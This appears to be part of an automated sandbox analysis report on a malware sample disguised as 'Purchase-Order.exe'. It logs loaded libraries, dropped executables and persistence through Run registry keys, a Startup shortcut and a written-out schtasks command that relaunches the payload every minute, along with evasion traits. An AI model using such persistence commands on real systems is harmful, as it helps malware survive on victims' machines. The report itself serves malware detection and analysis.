                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: propsys.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeSection loaded: propsys.dll
                                Source: C:\Users\user\Desktop\Purchase-Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                Source: LMDNDG.lnk.1.drLNK file: ..\..\..\..\..\Windata\OJTLMJ.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\ECBPMWm.iniJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                                Source: Purchase-Order.exeStatic file information: File size 2205184 > 1048576
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                                Source: Purchase-Order.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x16fe00
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00DA20F6 LoadLibraryA,GetProcAddress,8_2_00DA20F6
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D9020C pushfd ; retf 8_2_00D90215
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00DAC6CC push esi; ret 8_2_00DAC6CE
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D6CB5D push edi; ret 8_2_00D6CB5F
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D6CC76 push esi; ret 8_2_00D6CC78
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D6CE51 push esi; ret 8_2_00D6CE53
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D6CF3A push edi; ret 8_2_00D6CF3C
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D67795 push ecx; ret 8_2_00D677A8
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D8BB9D push FFFFFF8Bh; iretd 8_2_00D8BB9F

                                Persistence and Installation Behavior

                                barindex
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile created: C:\ProgramData\Synaptics\RCX600B.tmpJump to dropped file
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeFile created: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile created: C:\Users\user\Desktop\._cache_Purchase-Order.exeJump to dropped file
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile created: C:\ProgramData\Synaptics\RCX600B.tmpJump to dropped file
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file

                                Boot Survival

                                barindex
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn LMDNDG.exe /tr C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe /sc minute /mo 1
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LMDNDG.lnkJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LMDNDG.lnkJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LMDNDGJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LMDNDGJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (2112).png
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D5F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,8_2_00D5F78E
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00DA7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,8_2_00DA7F0E
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D61E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_00D61E5A
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeWindow / User API: threadDelayed 4992Jump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeWindow / User API: foregroundWindowGot 1467Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeAPI coverage: 3.8 %
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exe TID: 6832Thread sleep time: -49920s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7064Thread sleep time: -11220000s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 6188Thread sleep time: -60000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeLast function: Thread delayed
                                Source: C:\ProgramData\Synaptics\Synaptics.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeThread sleep count: Count: 4992 delay: -10Jump to behavior
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, type: DROPPED
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D92044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00D92044
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D9219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00D9219F
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D924A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_00D924A9
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D86B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,8_2_00D86B3F
